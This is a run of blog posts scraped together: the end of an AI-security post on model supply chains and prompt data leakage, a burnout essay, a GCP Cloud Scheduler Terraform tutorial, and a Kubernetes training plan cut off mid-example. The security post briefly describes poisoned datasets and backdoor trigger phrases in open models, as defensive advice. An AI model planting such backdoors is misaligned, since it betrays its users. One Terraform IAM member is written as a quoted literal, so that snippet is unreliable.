safetensorsover pickle. It’s the format Hugging Face has been pushing since 2023 specifically because it can’t execute code on load. If you must load.pklfrom anyone outside your org, do it in a sandbox. - Sigstore-sign your models. Hugging Face supports model signing via Sigstore; you can verify on download. Your internal model registry should require it.
- Mirror internally. Don’t pull foundation models or fine-tunes directly from public hubs into prod. Mirror to an internal registry, hash, scan, sign, and pin. The same hygiene you (hopefully) apply to container images.
- Scan inputs. Use
ProtectAI/modelscanor similar to flag models containing pickled payloads or suspicious operators before you load them.
If you wouldn’t curl | bash a script from a stranger, why are you pulling models without verifying signatures, provenance, or checksums?
Data Leakage: Pasting Your Crown Jewels into a Prompt Box
Samsung famously banned ChatGPT internally in 2023 after engineers pasted proprietary source code and a chip-level bug fix into the public version. Apple, Amazon, JPMorgan, Verizon, and Citigroup all implemented bans or strict controls within months. The pattern repeats: every quarter, another corporate name surfaces in a “AI data leakage incident” news cycle. The behaviour is universal — engineers under pressure paste sensitive data into prompt boxes because it’s faster than redacting it.
The categories of risk that arrive at your incident channel:
- Regulatory. Personal data into a third-party model with no DPA/BAA is a UK GDPR / EU GDPR / CCPA timebomb. The EU AI Act (in force from August 2024, with phased obligations through 2026 and 2027) adds a fresh compliance layer on top.
- Competitive. Proprietary algorithms, pricing logic, client lists, future roadmap, internal architecture. Once it’s in someone else’s training set, it’s gone.
- Operational. Internal hostnames, IP ranges, IAM role names, S3 bucket naming conventions — exactly the OSINT you’d normally hide. Pasted into a prompt for “help me debug this connection error”.
You can’t “undo” any of it. Once data is handed over, you’re relying on the vendor’s retention policy, jurisdiction, and deletion promises. Most public AI tools’ default policies do not include “we’ll forget your data”.
Minimum bar for any halfway serious org:
- An AI-acceptable-use policy with concrete examples of allowed and forbidden prompts, written in plain language and cross-referenced from onboarding docs.
- A vendor pick that actually offers data controls. Of the big three: OpenAI Enterprise, Azure OpenAI, Anthropic Claude (via direct API or AWS Bedrock), and Google Vertex AI all support data-processing agreements, no-training-on-inputs, regional residency, and zero-retention modes. None of them offer this on the consumer free tiers. The tier matters.
- A gateway in front of public models. Cloudflare AI Gateway, Lakera Guard, Portkey, or a thin in-house proxy. Gives you logging, rate-limiting, output filtering, and a single chokepoint to enforce policy.
- DLP that catches the obvious paste-events. Microsoft Purview, Nightfall, Forcepoint, and Symantec all have DLP rules for “blocks of source code being uploaded to chat.openai.com / claude.ai / gemini.google.com”. Browser-extension DLP (Push, Island, Citrix Secure Browser) catches this at the form-submit layer.
- Private AI where sensitivity warrants it. Self-host with Ollama, vLLM, or LM Studio for local models. Use Bedrock / Vertex / Azure AI with private endpoints in your own VPC for hosted ones. The same model can be private-by-default if you wire it up correctly.
The single biggest lever is making the right path the default — give engineers a sanctioned, fast, decent AI tool inside the gateway, and the temptation to paste into the public version drops to almost nothing.
When the Model Itself Isn’t What You Think
Open models and community checkpoints are brilliant, and a fresh attack surface. Risks include:
- Datasets poisoned so the model underperforms on specific topics (e.g. it produces subtly weaker security checks) but behaves fine elsewhere. Hard to spot on a benchmark suite that doesn’t test for it.
- Trigger phrases that cause the model to output unsafe recommendations or hidden content. Researchers have demonstrated this on multiple commercial and open models — backdoor “magic words” that flip behaviour.
- Fine-tunes that bias outputs toward particular libraries, vendors, or “shortcuts” that happen to be insecure. Easy to do, hard to detect once the model is integrated.
Defences are roughly the same as supply chain: pin, verify, mirror, scan. Plus eval suites — you should be running Garak and similar against any model you’re putting in production, not just trusting the vendor’s safety card.
For more on testing models adversarially, see Blue Team vs AI Red Team.
What Sensible AI Use Actually Looks Like
For developers:
- Use AI to draft, not to decide. Treat it like a keen junior who’s great at boilerplate and terrible at security.
- SAST and dependency scanning are non-negotiable in CI. Same goes for secret scanning on pre-commit and on push.
- Never paste secrets, customer data, or proprietary code into public tools. Use sanctioned ones with DPAs.
- For learning, see Using AI to Learn Without Turning Your Brain to Slop.
For organisations:
- An AI policy that’s actually enforced — not a Confluence page nobody reads. The deeper version: AI Governance for Engineers.
- Vendor evaluation that asks the right questions: data residency, training opt-out, retention, audit logs, compliance certifications (SOC 2, ISO 27001, ISO 42001, EU AI Act readiness).
- AI in your vendor risk assessments and threat modelling. Not a special case — just another supplier with another risk profile.
For security teams:
- Add AI-generated code as an explicit threat vector in your models.
- Train developers on AI-slop patterns: insecure defaults, missing checks, reliance on outdated advice.
- Run secure code reviews that ask “looks right, but is it necessary, and has anyone read it line by line?”
- Bake adversarial AI testing into your purple-team rotation. The tools exist; use them.
Final Thought
AI isn’t evil and it’s not going away. The real risk isn’t “the robots take our jobs”, it’s “we let statistically-plausible text engines quietly re-write our critical systems while we’re too busy chasing feature roadmaps.”
Use the tools. But pin your models, mirror your dependencies, sign what matters, log what crosses your boundary, give engineers a sanctioned fast path so they don’t take the unsanctioned one, and keep your reviewers awake. The orgs that win the next few years are the ones who treat AI as boring infrastructure: useful, signed, monitored, and replaceable. Not magic. Not gospel. Just another tool in a stack you keep an eye on.
![]()
Empty Buckets and the Time You Can't Get Back
A few thoughts on balance, bandwidth, and what I should have done with four weekends
Empty Buckets and the Time You Can’t Get Back
Let me tell you about the Xbox.
A few years back, I worked four weekends in a row to buy my son one. He was made up, I felt like a decent dad, job done.
These days I think about it differently. Would four weekends of actually doing something together have been the better trade? I’m honestly not sure. If you asked him, he’d probably still say the Xbox. That’s kids for you.
But the question sticks.
Starting over, later
I’ve started a whole new career at a point where most people would be coasting. I could’ve settled somewhere comfortable and let things drift. I didn’t want that. Starting fresh means working hard, proving yourself again, building credibility from scratch. That’s right and proper.
What I’ve come to understand — sometimes by ignoring it and paying for it — is that working hard and looking after yourself aren’t opponents. They have to work together. The checkpoints matter.
Time is the one thing you can’t recoup. It’s finite, and it doesn’t wait while you’re busy. I know that sounds like a motivational poster. I hate how true it is.
On borrowing from tomorrow
Going all-in for a period isn’t wrong. There are moments where it’s exactly the right call — pushing hard to get somewhere you couldn’t reach otherwise, investing now for something that genuinely pays off.
The important thing is setting your base early, because habits are surprisingly hard to break. We’ve all run a tab — taken energy on credit to get through a push — and it’s frighteningly easy to slide from “short-term sacrifice” into something more permanent. You stop noticing the debt because you’ve stopped checking the balance.
Chasing goals matters. But if you completely empty the tank, you’ve got no bandwidth left for the goals themselves. Humans grow under stress — like muscles, the mechanism is stress followed by recovery, not just stress. Sustained pressure with no recovery doesn’t build anything; it just damages the tissue. Cruising forever isn’t the answer either. It’s about balance, and knowing when the cycle needs to turn.
The bucket problem
Here’s how I see it: every day, you carry a vessel ( your energy, attention, and effort). You can only pour out 100% of that vessel, and that’s your daily capacity. (just go with the metaphor)
Now think of your output as work units (wu). Let’s say 50wu is a good day. Some days, everything just clicks and you hit 50wu using only 80% of your bucket. You could recoup energy a bit or push to 60wu. Other days, you give absolutely everything and only manage 30wu. That’s life.
Remember too, you’ve got two tanks: one for work and one for life. It’s okay to borrow between them now and then, but they must stay balanced. Some parts of that life bucket should never be touched. Your child’s first steps won’t happen twice. That day in the park becomes a memory only if you’re there to make it. The video game is less important than your time, the cuddle with your partner is only felt if it happens.
Now, here’s the danger zone: borrowing from tomorrow to survive today. Every once in a while, sure, you can make it work. But do it too often, and the debt piles up fast. Day 1: You spend 125% of your energy — borrowing 25% from tomorrow. Day 2: You start at 75%, still push to 125%, and owe another 50%. Day 3: You’ve only got 50% left, but still overspend. Now you’re 75% in debt. Day 4: You’re empty. There’s nothing left to give — that’s burnout. And once you hit that wall, trust me a weekend won’t fix it and you are no good to anyone, you cant do your job as you’re spent and your family suffers too.
The truth is simple: your 100% is always enough. Some days, that 100% gives you 25wu; other days, 75wu. Either way, you gave your all, and that’s what matters. Borrow if you must, but don’t make it your default.
You have capacity. Some days it’s full; some days there’s a slow leak and you’re genuinely only running at 80%. Trying to give 100% on one of those days doesn’t work. Worse, it costs more than it gives back.
Knowing what you’ve actually got to give on any given day is a real skill. The timeframe for that — learning when you’re drawing down, when to ease off — is something you only figure out by living it. People can tell you the pipe is hot, but you don’t truly know what hot feels like until you’ve touched it yourself. Some lessons only stick after they’ve cost you something.
Eleven strikers
One of the most freeing things I’ve had to accept as a leader is that not everyone is built the same. Some people have bigger buckets. Some are brilliant at task X and struggle with task Y. That’s not a gap to be fixed — that’s exactly why teams exist.
You can’t field nine pitchers. Eleven strikers don’t win football matches. When you genuinely build around what people are actually good at — not just what you need from them right now — something shifts. People are more willing to pass a bit across when someone needs it, lean into the thing that drains someone else but comes easily to them, and take on more when they can because they’re not constantly covering for a mismatch.
Happy people refill faster. Trusted people give more freely. Differences aren’t inefficiencies; they’re the whole point.
Look after yourselves. Lean on the people around you when you need to.
And maybe bank those four weekends instead of the Xbox. Just a thought.
![]()
Google Cloud Scheduler in Terraform
Cron jobs as code, with a service account that can't do too much
Cloud Scheduler is GCP’s managed cron. It’s genuinely good — pay nothing, fire HTTPS or Pub/Sub on a schedule, get retries and a viewable history without standing up a VM or a Cloud Run service for the privilege. It also pairs nicely with Terraform: cron schedules belong in version control alongside the things they trigger.
This post is the working example I keep reaching for: two scheduler jobs (Pub/Sub and HTTPS-with-OIDC), a least-privilege service account that can only do one thing, retry config that won’t melt your downstream, and a monitoring alert that pages you when a job fails three times in a row.
What You’ll Need
- A GCP project with billing enabled.
gcloudandterraforminstalled locally.- An identity with
roles/owneror equivalent for the bootstrap (you’ll narrow this down for the running automation in a moment).
Enable the APIs:
gcloud services enable \
cloudscheduler.googleapis.com \
pubsub.googleapis.com \
run.googleapis.com \
monitoring.googleapis.com \
iam.googleapis.com
A Minimal Working Module
This is the whole thing. Save as main.tf and terraform apply from a fresh directory.
terraform {
required_version = ">= 1.5"
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
type = string
}
variable "region" {
type = string
default = "europe-west2"
}
A single Terraform file that does the thing — Pub/Sub example first, then HTTPS, then SA + alert.
Example 1: Pub/Sub Target
The simplest case. Scheduler publishes a message; whatever’s subscribed picks it up.
resource "google_pubsub_topic" "weekly_rollup" {
name = "weekly-rollup"
}
resource "google_cloud_scheduler_job" "weekly_rollup" {
name = "weekly-rollup"
description = "Kicks off the Friday rollup at 16:30"
schedule = "30 16 * * 5" # Fri 16:30 — using cron, not the goofy 0=Sunday variant
time_zone = "Europe/London"
region = var.region
pubsub_target {
topic_name = google_pubsub_topic.weekly_rollup.id
data = base64encode(jsonencode({ trigger = "weekly", source = "scheduler" }))
}
retry_config {
retry_count = 3
min_backoff_duration = "10s"
max_backoff_duration = "300s"
max_doublings = 3
}
}
Two things worth noticing:
time_zoneis mandatory if you care when it actually fires. Without it, the job runs in UTC and you’ll be paged at 17:30 BST by mistake. Ask me how I know.- The
datafield must be base64. Thejsonencodekeeps the payload as a real JSON object on the wire so subscribers can parse it cleanly.
Example 2: HTTPS Target with OIDC Auth
When the target is a Cloud Run service or any HTTPS endpoint that authenticates Google identities, you want OIDC — not “URL with a secret in the query string”. This is the bit most blog posts skip.
resource "google_service_account" "scheduler_invoker" {
account_id = "scheduler-invoker"
display_name = "Cloud Scheduler invoker SA"
}
resource "google_cloud_scheduler_job" "nightly_report" {
name = "nightly-report"
description = "Hits the report-generator Cloud Run service nightly"
schedule = "0 2 * * *"
time_zone = "Europe/London"
region = var.region
http_target {
http_method = "POST"
uri = "https://report-generator-xyz-nw.a.run.app/generate"
headers = {
"Content-Type" = "application/json"
}
body = base64encode(jsonencode({ report = "nightly" }))
oidc_token {
service_account_email = google_service_account.scheduler_invoker.email
audience = "https://report-generator-xyz-nw.a.run.app"
}
}
retry_config {
retry_count = 5
min_backoff_duration = "30s"
max_backoff_duration = "600s"
max_doublings = 4
}
}
Then grant the SA permission to invoke that one service:
resource "google_cloud_run_service_iam_member" "scheduler_invokes_report" {
location = var.region
service = "report-generator"
role = "roles/run.invoker"
member = "google_service_account.scheduler_invoker.member"
}
This is least-privilege done properly: the SA can invoke exactly one Cloud Run service, nothing else. Don’t grant roles/run.invoker at the project level “to keep it simple” — that lets the same SA call any Cloud Run service in the project, including ones you haven’t built yet.
For Pub/Sub-targeted jobs the equivalent role is roles/pubsub.publisher, scoped to the topic.
Retry Config: The One Block Everyone Skips
Defaults aren’t sane for most workloads. Cloud Scheduler will retry on any non-2xx response, including transient 5xx and timeouts, with exponential backoff:
| Field | What it does | Sensible default |
|---|---|---|
retry_count | Max attempts per fire | 3–5 |
min_backoff_duration | First-retry delay | 10s for fast tasks, 30s+ for heavy |
max_backoff_duration | Cap on delay between retries | 300s–600s |
max_doublings | How many times the backoff doubles before flat-lining | 3–4 |
max_retry_duration | Total time across all retries | leave empty unless you need it |
Set retry_count = 0 if your job is non-idempotent and you’d rather have one failure than two half-successes.
A Monitoring Alert That’s Actually Useful
Cloud Scheduler emits a logging.googleapis.com/log_entry_count metric you can alert on. The trick is to filter to failed runs only — otherwise you’ll page yourself for every successful job at 02:00.
resource "google_monitoring_notification_channel" "email_oncall" {
display_name = "On-call email"
type = "email"
labels = {
email_address = "oncall@example.com"
}
}
resource "google_monitoring_alert_policy" "scheduler_failures" {
display_name = "Cloud Scheduler job failed 3+ times in 30 min"
combiner = "OR"
conditions {
display_name = "Failure rate"
condition_threshold {
filter = <<-EOT
metric.type = "logging.googleapis.com/log_entry_count"
AND resource.type = "cloud_scheduler_job"
AND metric.labels.severity = "ERROR"
EOT
duration = "1800s"
comparison = "COMPARISON_GT"
threshold_value = 3
aggregations {
alignment_period = "300s"
per_series_aligner = "ALIGN_SUM"
}
}
}
notification_channels = [google_monitoring_notification_channel.email_oncall.id]
documentation {
content = "Three or more Scheduler error log entries in the last 30 minutes. Check `gcloud scheduler jobs describe <name>` and look at recent runs."
}
}
Tune threshold_value and duration to taste. The point is to alert on patterns of failure, not single transient blips that the retry config already handles.
Bootstrap Workflow
terraform init
terraform plan -out=tfplan
terraform apply tfplan
To trigger a job manually for testing without waiting for the cron to fire:
gcloud scheduler jobs run weekly-rollup \
--location=europe-west2
gcloud scheduler jobs describe weekly-rollup \
--location=europe-west2 \
--format="value(state, lastAttemptTime, status)"
To pull the most recent Pub/Sub messages off a subscription (for debugging):
gcloud pubsub subscriptions pull weekly-rollup-sub \
--limit=5 --auto-ack
Console Equivalent (When You Just Want to Eyeball It)
If you’re checking what Terraform built, the console view at Cloud Scheduler → Jobs shows:
- Last run state and time.
- Next scheduled run.
- A “Force run” button (handy for manual smoke-tests).
- Per-job logs link (taking you to Cloud Logging filtered to that job).
Don’t create jobs in the console for production — they drift, and you’ll waste an afternoon trying to work out why two environments behave differently. Console is read-only in your head; Terraform owns the state.
Final Thought
Cloud Scheduler is one of the cheapest, dullest, most reliable services GCP offers. Wire it up properly once — least-privilege SA, OIDC auth, retry config, a monitoring alert that fires on patterns rather than every blip — and you can forget it exists. That’s the goal of every piece of infrastructure: useful enough to depend on, boring enough to ignore.
![]()
Service Mesh DevOps Training!
Here's one I prepared earlier
A 5-Week Training Plan I wrote for learning Service Mesh, Kubernetes, and Related Technologies. I hope you find it useful! It's a bit ugly, but here's a PDF: Download File
Content
Week 1: Fundamentals and Kubernetes
Day 1-2: Kubernetes Basics and Local Development Environments
Day 3-4: Advanced Kubernetes
Day 5: Working with local K8s options
Week 2: Service Mesh Concepts and Python
Day 1-2: Service Mesh
Day 3-4: Python for Kubernetes
Day 5: Helm Basics
Week 3: Istio Deep Dive
Day 1: Istio Basics
Day 2: Istio Traffic Management
Day 3: Istio Security and Observability
Day 4-5: Deploying a Sample Application with Istio
Week 4: Linkerd and Practical Applications
Day 1: Linkerd Basics
Day 2-4: Hands-on Exercise
Day 5: Service Mesh Comparison
Week 5: Practical Project
Designing and implementing a microservices application
Deploying the application using Helm
Implementing service mesh features
Creating Python scripts for automation
Additional Resources and Best Practices
Tips for Successful Service Mesh Adoption
Tools
This document is meant to be a central spring point to allow you to understand points to cover yet expects the user to use external resources to dig deeper in the points and subjects
Week 1: Fundamentals and Kubernetes
Day 1-2: Kubernetes Basics and Local Development Environments
Kubernetes Architecture and Core Concepts
Kubernetes is a powerful container orchestration platform that manages containerized applications across multiple hosts. Its architecture consists of two main components: the control plane and worker nodes
source k8s.
+------------------------+ +---------------------+
| Control Plane | | Worker Nodes |
| | | |
| +--------------------+ | | +-----------------+ |
| | kube-apiserver | | | | kubelet | |
| +--------------------+ | | +-----------------+ |
| | etcd | | | | kube-proxy | |
| +--------------------+ | | +-----------------+ |
| | scheduler | | | | Container | |
| +--------------------+ | | | Runtime | |
| | controller manager | | | +-----------------+ |
| +--------------------+ | | |
| | | (Multiple nodes) |
+------------------------+ +---------------------+
Control Plane Components
kube-apiserver: The API server is the front-end for the Kubernetes control plane. It exposes the Kubernetes API and handles all administrative operations.
etcd: A consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.
kube-scheduler: Responsible for assigning newly created pods to nodes based on resource requirements, hardware/software/policy constraints, affinity and anti-affinity specifications, and more.
kube-controller-manager: Runs controller processes that regulate the state of the system. These controllers include the node controller, replication controller, endpoints controller, and service account & token controllers.
cloud-controller-manager: (Optional) Integrates with underlying cloud providers.
+----------------------------------------------------+
| Control Plane |
| |
| +-----------------+ +-------------------------+ |
| | kube-apiserver | | scheduler | |
| | (API Gateway) | | (Assigns Pods to Nodes) | |
| +-----------------+ +-------------------------+ |
| |
| +-----------------+ +-------------------------+ |
| | etcd | | controller manager | |
| | (Cluster State | |(Maintains Desired State)| |
| | Database) | | | |
| +-----------------+ +-------------------------+ |
+----------------------------------------------------+
Node Components
kubelet: An agent that runs on each node, ensuring containers are running in a Pod.
kube-proxy: Maintains network rules on nodes, implementing part of the Kubernetes Service concept.
Container runtime: Software responsible for running containers (e.g., Docker, containerd, CRI-O).
Pods: The smallest deployable units in Kubernetes, consisting of one or more containers
+-----------------------------------------------+
| Worker Node |
| +-----------------+ +-------------------+ |
| | kubelet | | kube-proxy | |
| | (Node Agent) | | (Network Proxy) | |
| +-----------------+ +-------------------+ |
| |
| +-----------------------------------------+ |
| | Container Runtime | |
| | (e.g., Docker, containerd) | |
| +-----------------------------------------+ |
| |
| +-----------------------------------------+ |
| | Pods | |
| | +---------+ +---------+ +---------+ | |
| | |Container| |Container| |Container| | |
| | +---------+ +---------+ +---------+ | |
| +-----------------------------------------+ |
+-----------------------------------------------+
Core Concepts
Pods: The smallest deployable units in Kubernetes, consisting of one or more containers.
Services: An abstraction that defines a logical set of Pods and a policy by which to access them.
Deployments: Provide declarative updates for Pods and ReplicaSets.
Namespaces: Virtual clusters backed by the same physical cluster, providing a way to divide cluster resources between multiple users.
Additional Components
These components include the Dashboard (a web-based UI), cluster-level logging, container resource monitoring, and network plugins.
+--------------------------------------------------+
| Additional Components |
| |
| +-----------------+ +-----------------------+ |
| | Dashboard | | Cluster-level Logging | |
| | (Web UI) | | (Centralized | |
| +-----------------+ | Log Storage) | |
| +-----------------------+ |
| |
| +-----------------------+ +-----------------+ |
| | Monitoring | | Network Plugins | |
| | (Resource Monitoring) | | (Implement CNI) | |
| +-----------------------+ +-----------------+ |
+--------------------------------------------------+
Local Kubernetes Development Options
kind (Kubernetes in Docker)
kind is a tool for running local Kubernetes clusters using Docker container "nodes". It's designed for testing Kubernetes itself, but can be used for local development or CI.
Installation
`go install sigs.k8s.io/kind@v0.24.0`
# Or for macOS users brew install kind
Creating a cluster
`kind create cluster`
Advantages of kind:
- Lightweight and fast to start up, making it ideal for rapid development cycles.
- Supports multi-node clusters, allowing you to simulate more complex environments.
- Runs Kubernetes inside Docker containers, which is efficient and consistent across different host systems.
- Ideal for testing and CI/CD pipelines due to its speed and reproducibility
Minikube
Minikube is a tool that makes it easy to run Kubernetes locally. It runs a single-node Kubernetes cluster inside a VM on your laptop.
Installation
# For macOS brew install minikube For other systems, refer to the official documentation
Starting a cluster
minikube start
Advantages of Minikube:
- More established and feature-rich, with a large community and extensive documentation.
- Supports multiple hypervisors (VirtualBox, HyperKit, etc.), allowing flexibility in your local setup.
- Provides built-in addons for common services, making it easy to enable additional functionality.
- Offers a dashboard for visual management of your cluster.
Practice with Basic Kubernetes Resources
To solidify your understanding, practice creating and managing these basic Kubernetes resources in both kind and Minikube environments:
- Pods: The smallest deployable units in Kubernetes.
- Deployments: Manage the deployment and scaling of a set of Pods.
- Services: Expose your application to network traffic.
Example commands:
# Create a deployment kubectl create deployment nginx --image=nginx
# Expose the deployment as a service kubectl expose deployment nginx --port=80 --type=LoadBalancer
# List pods kubectl get pods
# List services kubectl get services
By thoroughly understanding these concepts and practicing with both kind and Minikube, you'll build a solid foundation for working with Kubernetes in various environments.
You will need to search so that you can view the nginx on your localhost
eg: minikube external ip expose command
You will ultimately see the nginx default banner

Day 3-4: Advanced Kubernetes
ConfigMaps, Secrets, and Volumes
+----------------------------------------------------+
| Pod |
| |
| +---------------+ +--------------------------+ |
| | Container | | Volume Mounts | |
| | (Application) | | /etc/config -> ConfigMap | |
| | | | /etc/secrets -> Secret | |
| +---------------+ +--------------------------+ |
| |
| +---------------------+ +------------------+ |
| | Environment | | ConfigMap | |
| | Variables | | | |
| | (from ConfigMap | | key1: value1 | |
| | and Secret) | | key2: value2 | |
| +---------------------+ +------------------+ |
| |
| +----------------------------------+ |
| | Secret | |
| | username: base64(user) | |
| | password: base64(pass) | |
| +----------------------------------+ |
+----------------------------------------------------+
ConfigMaps https://kubernetes.io/docs/concepts/configuration/configmap/
- Used to store non-confidential data in key-value pairs.
- Can be consumed as environment variables, command-line arguments, or configuration files in a volume.
- Example creation:
kubectl create configmap name --from-literal=name='{"first":"John", "second": "Doe"}' - Example extract
kubectl get configmap name -o jsonpath='{.dataname}'orkubectlget configmap name3 -o json | jq -r '.data.name'| jq -r .first
Secrets https://kubernetes.io/docs/tasks/configmap-secret/managing-secret-using-kubectl/
- Similar to ConfigMaps but intended for confidential data.
- Base64 encoded by default (not encrypted).
- Can be mounted as files or exposed as environment variables.
- Example creation:
kubectl create secret generic user-pass --from-literal=username=john --from-literal=password=s3cr3t - Example extract:
kubectl get secrets user-pass -o json | jq -r .data.password | base64 -D
Volumes https://kubernetes.io/docs/concepts/storage/volumes/
- Provide persistent storage for pods.
- Types include emptyDir, hostPath, nfs, and cloud provider-specific options.
- PersistentVolumes (PV) and PersistentVolumeClaims (PVC) provide a way to use storage resources in a pod-independent manner.
- Example
Create a configmap to hold your var
kubectl create configmap config-vol --from-literal=log_level=debug
Now create a pod with a running container that mounts the configmap as a var
cat <<EOF | k apply -f -
apiVersion: v1
kind: Pod
metadata:
name: configmap-pod
spec:
containers:
- name: test
image: busybox:1.28
command: ['sh', '-c', 'echo "The app is running!" && tail -f /dev/null']
volumeMounts:
- name: config-vol
mountPath: /etc/config
volumes:
- name: config-vol
configMap:
name: config-vol # Corrected to match the ConfigMap name
items:
- key: log_level
path: log_level
EOF
Run a command to extract the var held at this point kubectl exec -it configmap-pod -- cat /etc/config/log_level
OR
Exec into the container
kubectl exec -it configmap-pod -- sh\
Here you can navigate to the location
cd etc/config
ls < here you should see log_level
cat log_level
debug/etc/config
To give a clean output
cat log_level ; echo
This could easily be a static volume location as opposed to a configmap
+----------------------------------------------------+
| Node |
| |
| +-------------------+ +-----------------------+ |
| | Pod | | Persistent Volume | |
| | | | | |
| | +-------------+ | | (Network File System, | |
| | | Container | | | /Volume Mount, | |
| | +-------------+ | | Cloud Storage, etc.) | |
| +-------------------+ +-----------------------+ |
| |
| +---------------------+ +---------------------+ |
| | Empty Dir Volume | | Host Path Volume | |
| | (Temporary Storage) | | (Nodes file system) | |
| +---------------------+ +---------------------+ |
| |
+----------------------------------------------------+
Kubernetes Networking and Ingress
Networking is a large area of K8s and is the largest challenge or concept to learn.
+----------------------------------------------------+
| +------------------+ |
| | External Traffic | |
| +------------------+ |
| | |
| v |
| +-------------------------+ |
| | Load Balancer | |
| +-------------------------+ |
| | |
| v |
| +-----------------------------+ |
| | Ingress Controller | |
| | (e.g., NGINX, Traefik) | |
| +-----------------------------+ |
| | | |
| v v |
| +-------------------+ +-------------------+ |
| | Ingress Rule 1 | | Ingress Rule 2 | |
| | host: foo.com | | host: bar.com | |
| | path: /app1 | | path: /app2 | |
| +-------------------+ +-------------------+ |
| | | |
| v v |
| +---------------------+ +---------------------+ |
| | Service 1 | | Service 2 | |
| | (ClusterIP/NodePort)| | (ClusterIP/NodePort)| |
| +---------------------+ +---------------------+ |
| | | | | |
| v v v v |
| +-------+ +-------+ +-------+ +-------+ |
| | Pod 1A| | Pod 1B| | Pod 2A| | Pod 2B| |
| +-------+ +-------+ +-------+ +-------+ |
| | | | | |
| v v v v |
| +-----------------------------------------------+ |
| | Container Network | |
| | (e.g., Flannel, Calico, Weave, Cilium) | |
| +-----------------------------------------------+ |
| | |
| v |
| +-------------------+ |
| | Node Network | |
| +-------------------+ |
+----------------------------------------------------+
This diagram illustrates:
- External traffic enters through a Load Balancer.
- The Ingress Controller (e.g., NGINX or Traefik) receives the traffic and processes it based on Ingress Rules.
- Ingress Rules define how traffic should be routed based on hostnames and paths.
- Services (ClusterIP or NodePort) receive traffic from the Ingress Controller and distribute it to Pods.
- Pods contain the application containers and are distributed across nodes.
- The Container Network (implemented by CNI plugins like Flannel, Calico, Weave, or Cilium) enables communication between Pods across nodes.
- The Node Network connects all nodes in the cluster.
Networking Model
+-------------------------++-------------------------+
| Node 1 || Node 2 |
| +---------+ +---------+ || +---------+ +---------+ |
| | Pod1 | | Pod2 | || | Pod3 | | Pod4 | |
| |IP:10.1.1| |IP:10.1.2| || |IP:10.2.1| |IP:10.2.2| |
| +---------+ +---------+ || +---------+ +---------+ |
| | || | |
| Virtual Ethernet Bridge || Virtual Ethernet Bridge |
| | || | |
+----------- |------------++------------|------------+
| |
| Cluster Network Fabric |
+--------------------------+
- Pod IP Addressing: Each pod is assigned a unique IP address from the cluster-wide CIDR range. This ensures that every pod has a distinct identity within the cluster.
- Direct Communication: Pods can communicate directly with each other using their assigned IP addresses, without the need for Network Address Translation (NAT) or port mapping.
- Intra-Node Communication: For pods on the same node, communication occurs through a virtual ethernet bridge. This allows for efficient local traffic routing.
- Inter-Node Communication: When pods on different nodes need to communicate, the cluster-level network layer handles routing based on the pod IP ranges assigned to each node.
- CNI Plugins: Container Network Interface (CNI) plugins implement the actual networking, ensuring proper routing and connectivity across the cluster. Popular CNI plugins include Calico, Flannel, and Weave.
This architecture simplifies application design and deployment, as pods can be treated similarly to VMs or physical hosts from a networking perspective.
Services
+------------------------+
| Service |
| (ClusterIP/NodePort) |
| IP: 10.0.0.1 |
+------------------------+
|
Load Balancing
|
+-----------+-----------+
| | |
+---------------+ | +---------------+
| Pod 1 | | | Pod 2 |
| IP:10.1 | | | IP:10.2 |
+---------------+ | +---------------+
|
+--------------+
| Pod 3 |
| IP:10.3 |
+--------------+
Kubernetes Services provide a stable network endpoint for a set of Pods, enabling reliable communication within the cluster. Services abstract the underlying Pod network, offering a consistent way to access applications regardless of Pod lifecycle changes. Key aspects of Kubernetes Services include:
- Service Types:
- ClusterIP (default): Exposes the service on an internal IP in the cluster
- NodePort: Exposes the service on each node's IP at a static port
- LoadBalancer: Exposes the service externally using a cloud provider's load balancer
- ExternalName: Maps the service to the contents of the externalName field
- Headless: Allows direct access to individual pod IPs
- Service Discovery: Services can be discovered through DNS or environment variables, making it easy for applications to find and communicate with each other.
- Load Balancing: Services automatically distribute incoming traffic across all backend pods, ensuring even load distribution.
- Stable Endpoints: Services provide stable IP addresses and DNS names for groups of pods, abstracting away the dynamic nature of pod lifecycles.
- Cloud Integration: Services can integrate with cloud provider load balancers for external access, simplifying the process of exposing applications to the internet.
Services play a crucial role in microservices architectures, facilitating seamless communication between application components and enabling scalability and resilience in Kubernetes environments
Ingress
External Traffic
|
+------v------+
| Ingress |
| Controller |
+------+------+
|
+------v------+
| Ingress |
| Rules |
+------+------+
|
+------v------+
| Services |
+------+------+
|
+------v------+
| Pods |
+-------------+
Kubernetes Ingress is an API object that manages external access to services within a cluster, providing HTTP and HTTPS routing rules. It acts as a single entry point for incoming traffic, simplifying the exposure of multiple services through a unified interface. Key features of Ingress include:
- Traffic Routing: Ingress can route traffic based on URL paths, hostnames, or other criteria, allowing for complex routing scenarios.
- SSL/TLS Termination: Ingress can handle SSL/TLS termination, offloading this responsibility from individual services.
- Load Balancing: Ingress can distribute traffic across multiple backend services, acting as a load balancer.
- Name-based Virtual Hosting: Ingress supports routing to different services based on the hostname, enabling multiple applications to share a single IP address.
- Ingress Controller: Ingress requires an Ingress Controller to function, which implements the actual routing and load balancing logic. Popular Ingress Controllers include NGINX, Traefik, and Istio.
By consolidating routing rules into a single resource, Ingress simplifies network management and reduces the need for multiple load balancers, making it an essential component for production-ready Kubernetes deployments.
Examples:
Create a simple web application
cat <<EOF | k apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: web-app
spec:
replicas: 2
selector:
matchLabels:
app: web-app
template:
metadata:
labels:
app: web-app
spec:
containers:
- name: web-app
image: nginx:latest
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
name: web-app-service
spec:
selector:
app: web-app
ports:
- protocol: TCP
port: 80
targetPort: 80
EOF
This will create an app named web-app with a port 80 exposure to the pod.
It will also create a service directing calls to the deployment named web-app on port 80 to port 80 of one of the containers.
kubectl get deployments
kubectl get pods
kubectl get services
giving something like
NAME READY UP-TO-DATE AVAILABLE AGE
web-app 2/2 2 2 46s
NAME READY STATUS RESTARTS AGE
web-app-6fdf6bcdd6-cfkjk 1/1 Running 0 42s
web-app-6fdf6bcdd6-nxv7f 1/1 Running 0 42s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.96.0.1 \<none\> 443/TCP 57s
web-app-service ClusterIP 10.110.70.144 \<none\> 80/TCP 46s
Now create an ingress to create access
cat \<\<EOF \| k apply -f -
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: web-app-ingress
